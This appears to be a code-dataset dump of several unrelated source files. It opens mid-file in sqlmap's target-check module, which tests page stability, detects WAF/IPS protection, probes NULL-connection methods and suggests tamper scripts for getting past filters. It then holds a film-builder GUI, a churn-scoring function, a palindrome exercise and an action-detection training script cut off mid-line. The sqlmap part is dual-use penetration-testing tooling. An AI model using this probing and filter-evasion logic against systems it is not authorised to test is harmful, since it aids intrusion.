singleTimeLogMessage(warnMsg, logging.CRITICAL)\n\n kb.heavilyDynamic = True\n\n secondPage, _, _ = Request.queryPage(content=True)\n findDynamicContent(firstPage, secondPage)\n\ndef checkStability():\n \"\"\"\n This function checks if the URL content is stable requesting the\n same page two times with a small delay within each request to\n assume that it is stable.\n\n In case the content of the page differs when requesting\n the same page, the dynamicity might depend on other parameters,\n like for instance string matching (--string).\n \"\"\"\n\n infoMsg = \"testing if the target URL content is stable\"\n logger.info(infoMsg)\n\n firstPage = kb.originalPage # set inside checkConnection()\n\n delay = MAX_STABILITY_DELAY - (time.time() - (kb.originalPageTime or 0))\n delay = max(0, min(MAX_STABILITY_DELAY, delay))\n time.sleep(delay)\n\n secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)\n\n if kb.choices.redirect:\n return None\n\n kb.pageStable = (firstPage == secondPage)\n\n if kb.pageStable:\n if firstPage:\n infoMsg = \"target URL content is stable\"\n logger.info(infoMsg)\n else:\n errMsg = \"there was an error checking the stability of page \"\n errMsg += \"because of lack of content. 
Please check the \"\n errMsg += \"page request results (and probable errors) by \"\n errMsg += \"using higher verbosity levels\"\n logger.error(errMsg)\n\n else:\n warnMsg = \"target URL content is not stable (i.e. content differs). sqlmap will base the page \"\n warnMsg += \"comparison on a sequence matcher. If no dynamic nor \"\n warnMsg += \"injectable parameters are detected, or in case of \"\n warnMsg += \"junk results, refer to user's manual paragraph \"\n warnMsg += \"'Page comparison'\"\n logger.warning(warnMsg)\n\n message = \"how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] \"\n choice = readInput(message, default='C').upper()\n\n if choice == 'Q':\n raise SqlmapUserQuitException\n\n elif choice == 'S':\n showStaticWords(firstPage, secondPage)\n\n message = \"please enter value for parameter 'string': \"\n string = readInput(message)\n\n if string:\n conf.string = string\n\n if kb.nullConnection:\n debugMsg = \"turning off NULL connection \"\n debugMsg += \"support because of string checking\"\n logger.debug(debugMsg)\n\n kb.nullConnection = None\n else:\n errMsg = \"Empty value supplied\"\n raise SqlmapNoneDataException(errMsg)\n\n elif choice == 'R':\n message = \"please enter value for parameter 'regex': \"\n regex = readInput(message)\n\n if regex:\n conf.regex = regex\n\n if kb.nullConnection:\n debugMsg = \"turning off NULL connection \"\n debugMsg += \"support because of regex checking\"\n logger.debug(debugMsg)\n\n kb.nullConnection = None\n else:\n errMsg = \"Empty value supplied\"\n raise SqlmapNoneDataException(errMsg)\n\n else:\n checkDynamicContent(firstPage, secondPage)\n\n return kb.pageStable\n\n@stackedmethod\ndef checkWaf():\n \"\"\"\n Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse\n \"\"\"\n\n if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):\n return None\n\n if kb.originalCode == _http_client.NOT_FOUND:\n return None\n\n _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)\n if _ is not None:\n if _:\n warnMsg = \"previous heuristics detected that the target \"\n warnMsg += \"is protected by some kind of WAF/IPS\"\n logger.critical(warnMsg)\n return _\n\n if not kb.originalPage:\n return None\n\n infoMsg = \"checking if the target is protected by \"\n infoMsg += \"some kind of WAF/IPS\"\n logger.info(infoMsg)\n\n retVal = False\n payload = \"%d %s\" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)\n\n place = PLACE.GET\n if PLACE.URI in conf.parameters:\n value = \"%s=%s\" % (randomStr(), agent.addPayloadDelimiters(payload))\n else:\n value = \"\" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER\n value += \"%s=%s\" % (randomStr(), agent.addPayloadDelimiters(payload))\n\n pushValue(kb.choices.redirect)\n pushValue(kb.resendPostOnRedirect)\n pushValue(conf.timeout)\n\n kb.choices.redirect = REDIRECTION.YES\n kb.resendPostOnRedirect = False\n conf.timeout = IPS_WAF_CHECK_TIMEOUT\n\n try:\n retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO\n except SqlmapConnectionException:\n retVal = True\n finally:\n kb.matchRatio = None\n\n conf.timeout = popValue()\n kb.resendPostOnRedirect = popValue()\n kb.choices.redirect = popValue()\n\n hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True)\n\n if retVal:\n if not kb.identifiedWafs:\n warnMsg = \"heuristics detected that the target \"\n warnMsg += \"is protected 
by some kind of WAF/IPS\"\n logger.critical(warnMsg)\n\n message = \"are you sure that you want to \"\n message += \"continue with further target testing? [Y/n] \"\n choice = readInput(message, default='Y', boolean=True)\n\n if not choice:\n raise SqlmapUserQuitException\n else:\n if not conf.tamper:\n warnMsg = \"please consider usage of tamper scripts (option '--tamper')\"\n singleTimeWarnMessage(warnMsg)\n\n return retVal\n\n@stackedmethod\ndef checkNullConnection():\n \"\"\"\n Reference: http://www.wisec.it/sectou.php?id=472f952d79293\n \"\"\"\n\n if conf.data:\n return False\n\n _ = hashDBRetrieve(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, True)\n if _ is not None:\n kb.nullConnection = _\n\n if _:\n dbgMsg = \"resuming NULL connection method '%s'\" % _\n logger.debug(dbgMsg)\n\n else:\n infoMsg = \"testing NULL connection to the target URL\"\n logger.info(infoMsg)\n\n pushValue(kb.pageCompress)\n kb.pageCompress = False\n\n try:\n page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)\n\n if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):\n kb.nullConnection = NULLCONNECTION.HEAD\n\n infoMsg = \"NULL connection is supported with HEAD method ('Content-Length')\"\n logger.info(infoMsg)\n else:\n page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: \"bytes=-1\"})\n\n if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):\n kb.nullConnection = NULLCONNECTION.RANGE\n\n infoMsg = \"NULL connection is supported with GET method ('Range')\"\n logger.info(infoMsg)\n else:\n _, headers, _ = Request.getPage(skipRead=True)\n\n if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):\n kb.nullConnection = NULLCONNECTION.SKIP_READ\n\n infoMsg = \"NULL connection is supported with 'skip-read' method\"\n logger.info(infoMsg)\n\n except SqlmapConnectionException:\n pass\n\n finally:\n kb.pageCompress = popValue()\n kb.nullConnection = False if kb.nullConnection is None else kb.nullConnection\n hashDBWrite(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, kb.nullConnection, True)\n\n return kb.nullConnection in getPublicTypeMembers(NULLCONNECTION, True)\n\ndef checkConnection(suppressOutput=False):\n threadData = getCurrentThreadData()\n\n if not re.search(r\"\\A\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\Z\", conf.hostname):\n if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):\n try:\n debugMsg = \"resolving hostname '%s'\" % conf.hostname\n logger.debug(debugMsg)\n socket.getaddrinfo(conf.hostname, None)\n except socket.gaierror:\n errMsg = \"host '%s' does not exist\" % conf.hostname\n raise SqlmapConnectionException(errMsg)\n except socket.error as ex:\n errMsg = \"problem occurred while \"\n errMsg += \"resolving a host name '%s' ('%s')\" % (conf.hostname, getSafeExString(ex))\n raise SqlmapConnectionException(errMsg)\n except UnicodeError as ex:\n errMsg = \"problem occurred while \"\n errMsg += \"handling a host name '%s' ('%s')\" % (conf.hostname, getSafeExString(ex))\n raise SqlmapDataException(errMsg)\n\n if not suppressOutput and not conf.dummy and not conf.offline:\n infoMsg = \"testing connection to the target URL\"\n logger.info(infoMsg)\n\n try:\n kb.originalPageTime = time.time()\n page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)\n\n rawResponse = \"%s%s\" % (listToStrValue(headers.headers if headers else \"\"), page)\n\n if conf.string:\n infoMsg = \"testing if the provided string is within the \"\n infoMsg += \"target URL page content\"\n logger.info(infoMsg)\n\n if conf.string not in rawResponse:\n 
warnMsg = \"you provided '%s' as the string to \" % conf.string\n warnMsg += \"match, but such a string is not within the target \"\n warnMsg += \"URL raw response, sqlmap will carry on anyway\"\n logger.warning(warnMsg)\n\n if conf.regexp:\n infoMsg = \"testing if the provided regular expression matches within \"\n infoMsg += \"the target URL page content\"\n logger.info(infoMsg)\n\n if not re.search(conf.regexp, rawResponse, re.I | re.M):\n warnMsg = \"you provided '%s' as the regular expression \" % conf.regexp\n warnMsg += \"which does not have any match within the target URL raw response. sqlmap \"\n warnMsg += \"will carry on anyway\"\n logger.warning(warnMsg)\n\n kb.errorIsNone = False\n\n if any(_ in (kb.serverHeader or \"\") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):\n singleTimeWarnMessage(\"turning off pre-connect mechanism because of incompatible server ('%s')\" % kb.serverHeader)\n conf.disablePrecon = True\n\n if not kb.originalPage and wasLastResponseHTTPError():\n if getLastRequestHTTPError() not in (conf.ignoreCode or []):\n errMsg = \"unable to retrieve page content\"\n raise SqlmapConnectionException(errMsg)\n elif wasLastResponseDBMSError():\n warnMsg = \"there is a DBMS error found in the HTTP response body \"\n warnMsg += \"which could interfere with the results of the tests\"\n logger.warning(warnMsg)\n elif wasLastResponseHTTPError():\n if getLastRequestHTTPError() not in (conf.ignoreCode or []):\n warnMsg = \"the web server responded with an HTTP error code (%d) \" % getLastRequestHTTPError()\n warnMsg += \"which could interfere with the results of the tests\"\n logger.warning(warnMsg)\n else:\n kb.errorIsNone = True\n\n if kb.choices.redirect == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:\n if (threadData.lastRedirectURL[1] or \"\").startswith(\"https://\") and conf.hostname in getUnicode(threadData.lastRedirectURL[1]):\n conf.url = re.sub(r\"https?://\", \"https://\", conf.url)\n match = re.search(r\":(\\d+)\", threadData.lastRedirectURL[1])\n port = match.group(1) if match else 443\n conf.url = re.sub(r\":\\d+(/|\\Z)\", r\":%s\\g<1>\" % port, conf.url)\n\n except SqlmapConnectionException as ex:\n if conf.ipv6:\n warnMsg = \"check connection to a provided \"\n warnMsg += \"IPv6 address with a tool like ping6 \"\n warnMsg += \"(e.g. 'ping6 -I eth0 %s') \" % conf.hostname\n warnMsg += \"prior to running sqlmap to avoid \"\n warnMsg += \"any addressing issues\"\n singleTimeWarnMessage(warnMsg)\n\n if any(code in kb.httpErrorCodes for code in (_http_client.NOT_FOUND, )):\n errMsg = getSafeExString(ex)\n logger.critical(errMsg)\n\n if conf.multipleTargets:\n return False\n\n msg = \"it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] \"\n if readInput(msg, default='Y', boolean=True):\n raise SqlmapSilentQuitException\n else:\n kb.ignoreNotFound = True\n else:\n raise\n finally:\n kb.originalPage = kb.pageTemplate = threadData.lastPage\n kb.originalCode = threadData.lastCode\n\n if conf.cj and not conf.cookie and not any(_[0] == HTTP_HEADER.COOKIE for _ in conf.httpHeaders) and not conf.dropSetCookie:\n candidate = DEFAULT_COOKIE_DELIMITER.join(\"%s=%s\" % (_.name, _.value) for _ in conf.cj)\n\n message = \"you have not declared cookie(s), while \"\n message += \"server wants to set its own ('%s'). 
\" % re.sub(r\"(=[^=;]{10}[^=;])[^=;]+([^=;]{10})\", r\"\\g<1>...\\g<2>\", candidate)\n message += \"Do you want to use those [Y/n] \"\n if readInput(message, default='Y', boolean=True):\n kb.mergeCookies = True\n conf.httpHeaders.append((HTTP_HEADER.COOKIE, candidate))\n\n return True\n\ndef checkInternet():\n content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]\n return CHECK_INTERNET_VALUE in (content or \"\")\n\ndef setVerbosity(): # Cross-referenced function\n raise NotImplementedError\n","repo_name":"sqlmapproject/sqlmap","sub_path":"lib/controller/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":75758,"program_lang":"python","lang":"en","doc_type":"code","stars":28899,"dataset":"github-code","pt":"38"} +{"seq_id":"24849957365","text":"import os\nfrom PySide2 import QtWidgets, QtCore, QtGui\nimport threading\n\nimport sys\nsys.path.append(os.path.dirname(__file__))\n\nimport filmBuilder\n\n\nclass FilmBuilderUI(QtWidgets.QWidget):\n def __init__(self):\n super(FilmBuilderUI, self).__init__()\n self.buildUI()\n\n def buildUI(self):\n self.mainLayout = QtWidgets.QVBoxLayout(self)\n # self.mainLayout.setContentsMargins(0, 0, 0, 0)\n self.mainLayout.setSpacing(0)\n\n self.setLayout(self.mainLayout)\n\n self.mainLayout.addWidget(QtWidgets.QLabel(\"Sequences:\"))\n self.radioButtons = []\n for sequence in filmBuilder.sequences:\n # Create a radio button for the sequence and add it to the layout\n sequenceButton = QtWidgets.QRadioButton(sequence)\n self.mainLayout.addWidget(sequenceButton)\n self.radioButtons.append(sequenceButton)\n\n self.mainLayout.addWidget(QtWidgets.QLabel(\"Entire film:\"))\n\n filmButton = QtWidgets.QRadioButton(\"Build entire film\")\n self.mainLayout.addWidget(filmButton)\n self.radioButtons.append(filmButton)\n\n spacerWidget = QtWidgets.QWidget()\n spacerWidget.setFixedHeight(50)\n self.mainLayout.addWidget(spacerWidget)\n\n self.buildButton = QtWidgets.QPushButton(\"Build\")\n self.buildButton.setMinimumHeight(50)\n self.buildButton.clicked.connect(self.buildFilm)\n self.mainLayout.addWidget(self.buildButton)\n\n def buildFilm(self):\n # Get the currently selected radio button\n selected = None\n for button in self.radioButtons:\n if button.isChecked():\n selected = button.text()\n break\n\n if selected is None:\n print(\"Nothing selected\")\n return\n\n if selected == \"Build entire film\":\n thread = threading.Thread(target=filmBuilder.buildFilm)\n thread.start()\n else:\n thread = threading.Thread(target=filmBuilder.buildSequence, args=(selected,))\n thread.start()\n\n # self.close()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication([])\n window = FilmBuilderUI()\n window.setWindowTitle(\"Film Builder\")\n window.setMinimumSize(400, 400)\n window.show()\n app.exec_()\n","repo_name":"gabrieljreed/unfamiliar_pipe","sub_path":"pipe/tools/nukeTools/filmBuilder/filmBuilderUI.py","file_name":"filmBuilderUI.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"38746782416","text":"import random\n\ndef assess(items):\n\n results = []\n\n # Simple ML, each dropped call doubles the churn likelyhood.\n # Better algorithms exist, substitute your own.\n for item in items:\n csv = item.split(\",\")\n\n # Call dropped\n dropped_str = csv[5]\n if dropped_str.lower() == \"true\":\n dropped = True\n else:\n dropped = False\n\n # Current sentiment\n current_str = csv[21]\n if current_str == \"\":\n current_pct = 
float(0.0)\n else:\n current_pct = float(current_str)\n\n # Previous sentiment\n previous_str = csv[22]\n if previous_str == \"\":\n previous_pct = float(0.0)\n else:\n previous_pct = float(previous_str)\n\n #####################################\n # Business logic\n # --------------\n # Step up by more annoyance each time\n # a call is dropped. Don't yet reduce\n # level if lots of successful calls.\n # Add some randomness so all data\n # not the exact same.\n #####################################\n if dropped:\n old_annoyance = current_pct - previous_pct\n new_annoyance = float(3.1) + old_annoyance + current_pct + random.random()\n else:\n new_annoyance = current_pct\n #####################################\n if new_annoyance > float(100.0):\n new_annoyance = float(100.0)\n #####################################\n\n # Append new_annoyance level to original input, plus the input current annoyance becomes output previous annoyance\n results.append(item + \",\" + str(new_annoyance) + \",\" + str(current_pct))\n\n return results\n","repo_name":"hazelcast/hazelcast-platform-demos","sub_path":"telco/churn/jet-jobs/src/main/resources/python/trainedmodel.py","file_name":"trainedmodel.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"38"} +{"seq_id":"38540594003","text":"def cleanUp(x):\n x = x.lower()\n for punc in \" ,.!@#$%^&*()-=_+{}[]|;:'\":\n x = x.replace(punc, \"\")\n \n return x\n\ndef isPalindrome(s):\n s = cleanUp(s)\n \n if s == s[::-1]:\n return True\n else:\n return False\n\na = input(\"What is your word? \")\nif isPalindrome(a):\n print(\"Yay! Your word is a palindrome.\")\nelse:\n print(\"Nope. Not a palindrome.\")","repo_name":"KGeetings/CMSC-115","sub_path":"In Class/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17756650482","text":"\"\"\" \n\nAuthor: Gurkirt Singh \nModified from https://github.com/gurkirt/realtime-action-detection\nLicensed under The MIT License [see LICENSE for details]\n\n\"\"\"\n\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.init as init\nimport argparse\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nfrom data import v2, ActionDetection, NormliseBoxes, detection_collate, CLASSES, BaseTransform\nfrom utils.augmentations import SSDAugmentation\nfrom layers.modules import MultiboxLoss\nfrom layers.functions import PriorBox\nfrom layers import MatchPrior\nfrom AMTNet import AMTNet\nimport numpy as np\nimport time, pdb\nfrom utils.evaluation import evaluate_detections\nfrom layers.box_utils import nms, decode_seq\nfrom utils import AverageMeter\nfrom torch.optim.lr_scheduler import MultiStepLR\n# from torchviz import make_dot, make_dot_from_trace\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\nparser = argparse.ArgumentParser(description='AMTNet detection training script')\nparser.add_argument('--version', default='v2', help='conv11_2(v2) or pool6(v1) as last layer')\nparser.add_argument('--basenet', default='vgg16_reducedfc.pth', help='pretrained base model')\nparser.add_argument('--dataset', default='ucf24', help='pretrained base model')\nparser.add_argument('--train_split', default=1, type=int, help='Split id')\nparser.add_argument('--ssd_dim', default=300, type=int, help='Input Size for SSD') # only support 300 
now\nparser.add_argument('--seq_len', default=2, type=int, help='Input sequence length ')\nparser.add_argument('--seq_gap', default=0, type=int, help='Gap between the frame of sequence')\nparser.add_argument('--fusion_type', default='cat', type=str, \n help='Fusion type to fuse from sequence of frames; options are SUM, CAT and NONE')\n # \nparser.add_argument('--input_type_base', default='rgb', type=str, help='INput tyep default rgb can take flow (brox or fastOF) as well')\nparser.add_argument('--input_type_extra', default='brox', type=str, help='INput tyep default brox can take flow (brox or fastOF) as well')\nparser.add_argument('--input_frames_base', default=1, type=int, help='Number of input frame, default for rgb is 1')\nparser.add_argument('--input_frames_extra', default=5, type=int, help='Number of input frame, default for flow is 5')\nparser.add_argument('--jaccard_threshold', default=0.5, type=float, help='Min Jaccard index for matching')\nparser.add_argument('--batch_size', default=4, type=int, help='Batch size for training')\nparser.add_argument('--num_workers','-j', default=4, type=int, help='Number of workers used in dataloading')\nparser.add_argument('--max_iter', default=40000, type=int, help='Number of training iterations')\nparser.add_argument('--val_step', default=10000, type=int, help='Number of training iterations')\nparser.add_argument('--cuda', default=1, type=str2bool, help='Use cuda to train model')\nparser.add_argument('--ngpu', default=1, type=int, help='Use cuda to train model')\nparser.add_argument('--lr', '--learning-rate', default=0.0005, type=float, help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, help='momentum')\nparser.add_argument('--stepvalues', default='10000,30000', type=str, help='step points for learning rate drop')\nparser.add_argument('--weight_decay', default=1e-4, type=float, help='Weight decay for SGD')\nparser.add_argument('--gamma', default=0.1, type=float, help='Gamma update for SGD at for stepwise schedule')\nparser.add_argument('--visdom', default=False, type=str2bool, help='Use visdom to for loss visualization')\nparser.add_argument('--vis_port', default=8095, type=int, help='Port for Visdom Server')\nparser.add_argument('--data_root', default='~/data/', help='Location of where in data is located like images and annotation file')\nparser.add_argument('--save_root', default='~/cache/', help='Location to where we wanr save the checkpoints of models')\nparser.add_argument('--iou_thresh', default=0.5, type=float, help='Evaluation threshold')\nparser.add_argument('--conf_thresh', default=0.01, type=float, help='Confidence threshold for evaluation')\nparser.add_argument('--nms_thresh', default=0.45, type=float, help='NMS threshold')\nparser.add_argument('--default_mult', default=1.0, type=float, help='NMS threshold')\nparser.add_argument('--topk', default=50, type=int, help='topk for evaluation')\nparser.add_argument('--man_seed', default=123, type=int, help='manula seed')\nargs = parser.parse_args()\n\n\nimport socket\nimport getpass\nusername = getpass.getuser()\nhostname = socket.gethostname()\n\nprint('\\n\\n ', username, ' is using ', hostname, '\\n\\n')\nif hostname == 'mars':\n args.data_root = '/mnt/mars-fast/datasets/'\n args.save_root = '/mnt/mars-gamma/'\n args.vis_port = 8097\nelif hostname in ['sun']:\n args.data_root = '/mnt/sun-gamma/'\n args.save_root = '/mnt/sun-gamma/'\n args.vis_port = 8096\nelif hostname == 'mercury':\n args.data_root = '/mnt/mercury-fast/datasets/'\n args.save_root = 
'/mnt/mercury-beta/'\n args.vis_port = 8098\nelif username == 'gurkirt' and hostname.startswith('comp'):\n args.data_root = '/home/gurkirt/datasets/'\n args.save_root = '/home/gurkirt/cache/'\n args.vis_port = 8097\n visdom=False\n# python train.py --seq_len=2 --num_workers=4 --batch_size=16 --ngpu=2 --fusion_type=NONE --input_type_base=brox --input_frames_base=5 --stepvalues=30000,50000 --max_iter=60000 --val_step=10000 --lr=0.001 \n\ntorch.set_default_tensor_type('torch.FloatTensor')\nnp.random.seed(args.man_seed)\ntorch.manual_seed(args.man_seed)\nif args.cuda:\n torch.cuda.manual_seed_all(args.man_seed)\n\ndef print_node(gdf):\n node_fns = gdf.next_functions\n for fn in node_fns:\n print(fn)\n print_node(fn[0][0])\n \n\ndef main():\n args.cfg = v2\n args.train_sets = 'train'\n args.test_sets = 'test'\n kd = 3\n args.means = (104, 117, 123) \n num_classes = len(CLASSES[args.dataset]) + 1 # only support multiclass datasets, not multilabel\n args.num_classes = num_classes\n args.stepvalues = [int(val) for val in args.stepvalues.split(',')]\n args.loss_reset_step = 30\n # args.val_step = 30000\n args.print_step = 10\n args.fusion_type = args.fusion_type.lower()\n args.fusion = args.fusion_type in ['sum','cat','mean']\n ## Define the experiment Name will used for save directory and ENV for visdom\n if not args.fusion:\n args.exp_name = 'AMTNet-{}-s{:d}-{}-sl{:02d}sg{:02d}-bs{:02d}-lr{:05d}'.format(args.dataset, args.train_split,\n args.input_type_base,\n args.seq_len, args.seq_gap, \n args.batch_size, int(args.lr * 100000))\n else:\n args.exp_name = 'AMTNet-{}-s{:d}-{}-{}-{}-sl{:02d}sg{:02d}-bs{:02d}-lr{:05d}'.format(args.dataset, args.train_split,\n args.fusion_type, args.input_type_base,\n args.input_type_extra,\n args.seq_len, args.seq_gap, \n args.batch_size,int(args.lr * 100000))\n\n \n \n\n num_feat_multiplier = {'cat': 2, 'sum': 1, 'mean': 1, 'none': 1}\n # fusion type can one of the above keys\n args.fmd = [512, 1024, 512, 256, 256, 256]\n args.kd = 3\n args.fusion_num_muliplier = num_feat_multiplier[args.fusion_type]\n\n ## DEFINE THE NETWORK\n net = AMTNet(args)\n \n if args.fusion:\n base_weights = torch.load(args.save_root +'weights/AMTNet_single_stream_{:s}_s{:02d}.pth'.format(args.input_type_base, args.train_split))\n extra_weights = torch.load(args.save_root + '/weights/AMTNet_single_stream_{:s}_s{:02d}.pth'.format(args.input_type_extra, args.train_split))\n print('Loading base network...')\n net.core_base.load_my_state_dict(base_weights, input_frames=args.input_frames_base)\n net.core_extra.load_my_state_dict(extra_weights, input_frames=args.input_frames_extra)\n else:\n base_weights = torch.load(args.data_root +'/weights/{}-ssd300_ucf24_120000.pth'.format(args.input_type_base))\n net.core_base.load_my_state_dict(base_weights, input_frames=args.input_frames_base)\n \n args.data_root += args.dataset + '/'\n args.save_root += args.dataset + '/'\n\n net = net.cuda()\n\n def xavier(param):\n init.xavier_uniform_(param)\n\n def weights_init(m):\n if isinstance(m, nn.Conv2d):\n xavier(m.weight.data)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n xavier(m.weight.data)\n m.bias.data.zero_()\n\n print('Initializing weights for HEADs...')\n net.loc.apply(weights_init)\n net.conf.apply(weights_init)\n\n args.save_root = args.save_root + 'cache/' + args.exp_name + '/'\n if not os.path.isdir(args.save_root):\n os.makedirs(args.save_root)\n\n if args.ngpu>1:\n print('\\nLets do dataparallel\\n\\n')\n net = torch.nn.DataParallel(net)\n\n parameter_dict = 
dict(net.named_parameters()) # Get parmeter of network in dictionary format wtih name being key\n params = []\n\n #Set different learning rate to bias layers and set their weight_decay to 0\n mult = 1; decay = 0\n\n for name, param in parameter_dict.items():\n if name.find('bias') > -1:\n mult = 2.0; decay = 0\n else:\n mult = 1.0; decay = 1\n if name.find('vgg')> -1 or name.find('extra')>-1 or name.find('L2Norm')>-1:\n mult = mult/args.seq_len\n\n # print(name, 'layer parameters will be trained @ {}'.format(args.lr*mult))\n params += [{'params':[param], 'lr': args.lr*mult, 'weight_decay':args.weight_decay*decay}]\n\n optimizer = optim.SGD(params, lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n criterion = MultiboxLoss()\n\n scheduler = MultiStepLR(optimizer, milestones=args.stepvalues, gamma=args.gamma)\n # Get proior or anchor boxes\n with torch.no_grad():\n priorbox = PriorBox(v2, args.seq_len)\n priors = priorbox.forward()\n train(args, net, priors, optimizer, criterion, scheduler)\n\n\ndef train(args, net, priors, optimizer, criterion, scheduler):\n log_file = open(args.save_root+\"training.log\", \"w\", 1)\n log_file.write(args.exp_name+'\\n')\n for arg in sorted(vars(args)):\n print(arg, getattr(args, arg))\n log_file.write(str(arg)+': '+str(getattr(args, arg))+'\\n')\n\n net.train()\n # loss counters\n batch_time = AverageMeter()\n losses = AverageMeter()\n loc_losses = AverageMeter()\n cls_losses = AverageMeter()\n\n print('Loading Dataset...')\n train_dataset = ActionDetection(args, args.train_sets, SSDAugmentation(args.ssd_dim, args.means),\n NormliseBoxes(), anno_transform=MatchPrior(priors, args.cfg['variance']))\n log_file.write(train_dataset.print_str)\n print(train_dataset.print_str)\n val_dataset = ActionDetection(args, args.test_sets, BaseTransform(args.ssd_dim, args.means),\n NormliseBoxes(), full_test=False)\n log_file.write(val_dataset.print_str)\n # print(val_dataset.print_str)\n epoch_size = len(train_dataset) // args.batch_size\n\n print('Training SSD on', train_dataset.name)\n\n if args.visdom:\n\n import visdom\n viz = visdom.Visdom(env=args.exp_name, port=args.vis_port)\n # initialize visdom loss plot\n lot = viz.line(\n X=torch.zeros((1,)).cpu(),\n Y=torch.zeros((1, 6)).cpu(),\n opts=dict(\n xlabel='Iteration',\n ylabel='Loss',\n title='Current SSD Training Loss',\n legend=['REG', 'CLS', 'AVG', 'S-REG', ' S-CLS', ' S-AVG']\n )\n )\n # initialize visdom meanAP and class APs plot\n legends = ['meanAP']\n for cls in CLASSES[args.dataset]:\n legends.append(cls)\n val_lot = viz.line(\n X=torch.zeros((1,)).cpu(),\n Y=torch.zeros((1,args.num_classes)).cpu(),\n opts=dict(\n xlabel='Iteration',\n ylabel='Mean AP',\n title='Current SSD Validation mean AP',\n legend=legends\n )\n )\n\n\n batch_iterator = None\n train_data_loader = data.DataLoader(train_dataset, args.batch_size, num_workers=args.num_workers,\n shuffle=True, collate_fn=detection_collate, pin_memory=True)\n val_data_loader = data.DataLoader(val_dataset, args.batch_size, num_workers=args.num_workers,\n shuffle=False, collate_fn=detection_collate, pin_memory=True)\n itr_count = 0\n torch.cuda.synchronize()\n t0 = time.perf_counter()\n for iteration in range(args.max_iter + 1):\n if (not batch_iterator) or (iteration % epoch_size == 0):\n # create batch iterator\n batch_iterator = iter(train_data_loader)\n\n # load train data\n images, _ , prior_gt_labels, prior_gt_locations, _, _ = next(batch_iterator)\n # images, ground_truths, _ , _, num_mt, img_indexs\n # pdb.set_trace()\n images = 
[img.cuda(0, non_blocking=True) for img in images if not isinstance(img, list)]\n prior_gt_labels = prior_gt_labels.cuda(0, non_blocking=True)\n prior_gt_locations = prior_gt_locations.cuda(0, non_blocking=True)\n # forward\n cls_out, reg_out = net(images)\n\n optimizer.zero_grad()\n loss_l, loss_c = criterion(cls_out, reg_out, prior_gt_labels, prior_gt_locations)\n loss = loss_l + loss_c\n\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n # pdb.set_trace()\n loc_loss = loss_l.item()\n conf_loss = loss_c.item()\n # print('Loss data type ',type(loc_loss))\n loc_losses.update(loc_loss)\n cls_losses.update(conf_loss)\n losses.update((loc_loss + conf_loss)/2.0)\n\n if iteration == 103:\n loc_losses.reset()\n cls_losses.reset()\n losses.reset()\n batch_time.reset()\n\n if iteration % args.print_step == 0:\n if args.visdom and iteration>100:\n losses_list = [loc_losses.val, cls_losses.val, losses.val, loc_losses.avg, cls_losses.avg, losses.avg]\n viz.line(X=torch.ones((1, 6)).cpu() * iteration,\n Y=torch.from_numpy(np.asarray(losses_list)).unsqueeze(0).cpu(),\n win=lot,\n update='append')\n\n\n torch.cuda.synchronize()\n t1 = time.perf_counter()\n batch_time.update(t1 - t0)\n\n print_line = 'Itration {:02d}/{:06d}/{:06d} loc-loss {:.3f}({:.3f}) cls-loss {:.3f}({:.3f}) ' \\\n 'average-loss {:.3f}({:.3f}) Timer {:0.3f}({:0.3f})'.format(iteration//epoch_size,\n iteration, args.max_iter, loc_losses.val, loc_losses.avg, cls_losses.val,\n cls_losses.avg, losses.val, losses.avg, batch_time.val, batch_time.avg)\n\n torch.cuda.synchronize()\n t0 = time.perf_counter()\n log_file.write(print_line+'\\n')\n print(print_line)\n\n itr_count += 1\n\n if itr_count % args.loss_reset_step == 0 and itr_count > 0:\n loc_losses.reset()\n cls_losses.reset()\n losses.reset()\n batch_time.reset()\n print('Reset ', args.exp_name,' after', itr_count*args.print_step)\n itr_count = 0\n\n\n if (iteration % args.val_step == 0 or iteration in [1000, args.max_iter]) and iteration>0:\n torch.cuda.synchronize()\n tvs = time.perf_counter()\n print('Saving state, iter:', iteration)\n torch.save(net.state_dict(), args.save_root + 